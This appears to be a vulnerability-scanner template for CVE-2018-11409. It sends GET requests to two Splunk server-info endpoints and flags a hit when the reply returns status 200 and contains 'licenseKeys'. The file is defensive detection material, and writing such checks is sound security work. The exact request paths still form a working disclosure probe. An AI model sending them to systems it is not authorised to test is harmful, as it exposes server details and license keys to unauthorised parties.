id: CVE-2018-11409 info: name: Splunk Sensitive Information Disclosure author: Harsh Bothra severity: medium reference: https://nvd.nist.gov/vuln/detail/CVE-2018-11409 tags: cve,cve2018,splunk requests: - method: GET path: - '{{BaseURL}}/en-US/splunkd/__raw/services/server/info/server-info?output_mode=json' - '{{BaseURL}}/__raw/services/server/info/server-info?output_mode=json' matchers-condition: and matchers: - type: status status: - 200 - type: word words: - licenseKeys